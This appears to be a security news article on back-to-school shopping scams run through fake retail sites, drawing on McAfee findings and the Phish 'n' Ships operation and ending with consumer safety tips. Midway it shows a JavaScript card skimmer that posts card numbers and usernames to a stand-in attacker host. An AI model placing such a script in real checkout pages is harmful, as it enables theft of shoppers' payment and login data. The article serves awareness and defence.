Beware of New Back-to-School Shopping Scams Driving Users to Fake Shopping Sites

As families nationwide gear up for the back-to-school season, cybercriminals are seizing this opportunity to launch sophisticated shopping scams. These malicious campaigns exploit the surge in online shopping, targeting individuals seeking deals on school supplies and exclusive offers.

Emergence of Counterfeit Retail Websites

Recent reports indicate a significant rise in counterfeit retail websites, manipulated delivery notifications, and sophisticated phishing schemes. These tactics are meticulously designed to harvest personal and payment information from unsuspecting users.

Tactics Employed by Scammers

This year’s scams are particularly insidious due to the deployment of convincingly crafted fake websites. These sites are disseminated through sponsored search placements, email promotions, and, most notably, social media advertisements. The fraudulent ads boast attractive deals on a wide range of products, from classroom essentials to high-ticket electronics, using AI-generated visuals to mimic reputable retailers.

The seamless experience offered by these sites often deceives consumers, who may only realize the fraud after financial loss or data compromise.

Technical Sophistication of Scams

McAfee analysts identified this coordinated threat surge in early August, following a marked increase in user reports and threat telemetry. Their research revealed that scammers employ automated platforms to rapidly create numerous fake shopping portals. Each site is engineered to evade basic detection, utilizing randomized domain registrations and SSL certificates to appear legitimate.

These technical strategies, combined with aggressive promotion on social platforms, funnel a high volume of web traffic through malicious infrastructure.

Advanced Techniques: JavaScript Payloads

A particularly insidious technique uncovered by McAfee researchers involves backend JavaScript payloads embedded in checkout pages. Upon form submission, these scripts invisibly relay harvested credit card numbers and login credentials to attacker-controlled servers, often encrypting transmissions to circumvent basic network filters.

The embedded payload resembles the following obfuscated pattern:

“`javascript
(function(){
var xhr=new XMLHttpRequest();
xhr.open(‘POST’,’https://malicious-server.com/collect’,true);
xhr.setRequestHeader(‘Content-Type’,’application/json’);
xhr.send(JSON.stringify({card:document.getElementById(‘cc_num’).value,user:document.getElementById(‘usr’).value}));
})();
“`

This approach not only enables immediate credential exfiltration but also provides attackers with a persistent foothold for further account compromise.

Broader Context: Rise in Fake Online Stores

The back-to-school scams are part of a larger trend of fake online stores designed to steal consumer information. For instance, a sophisticated cybercrime operation dubbed Phish ‘n’ Ships was uncovered recently. It operated through a network of fraudulent e-commerce platforms exploiting digital payment processing systems. The threat actors compromised legitimate websites via vulnerability exploitation by injecting malicious code that generated fake product listings. These listings were enhanced with SEO metadata to achieve premium positioning in search results. When users clicked these listings, they were redirected via a sophisticated traffic forwarding system to threat actor-controlled domains featuring fraudulent storefronts. These stores integrated with specifically targeted third-party payment processors to capture consumers’ credit card information and personal identifiable information via a seemingly legitimate checkout process. The operation’s infrastructure included over 1,000 compromised legitimate websites and 121 fabricated e-commerce platforms, resulting in estimated financial losses exceeding tens of millions of dollars since its inception in 2019.

Protective Measures for Consumers

As the back-to-school season continues, consumers—especially those enticed by unfamiliar retailers and urgent promotional ads—remain prime targets for such advanced and evolving scams. To protect themselves, consumers should:

– Verify Website Legitimacy: Before making a purchase, research the retailer. Look for reviews and ratings on independent sites or forums. Be cautious of stores with negative feedback or no online presence outside their website.

– Check for Secure Connections: Ensure the website uses HTTPS and displays a padlock icon in the browser’s address bar, indicating a secure connection.

– Be Wary of Unbelievable Deals: If an offer seems too good to be true, it likely is. Scammers often lure victims with heavily discounted products.

– Avoid Clicking on Suspicious Links: Be cautious of links received via email or social media, especially from unknown sources. Instead, navigate directly to the retailer’s official website.

– Monitor Financial Statements: Regularly check bank and credit card statements for unauthorized transactions.

– Use Trusted Payment Methods: Opt for credit cards or reputable payment services that offer fraud protection. Avoid payment methods that don’t offer recourse, such as wire transfers or cryptocurrency.

By staying vigilant and adopting these protective measures, consumers can significantly reduce their risk of falling victim to these sophisticated shopping scams.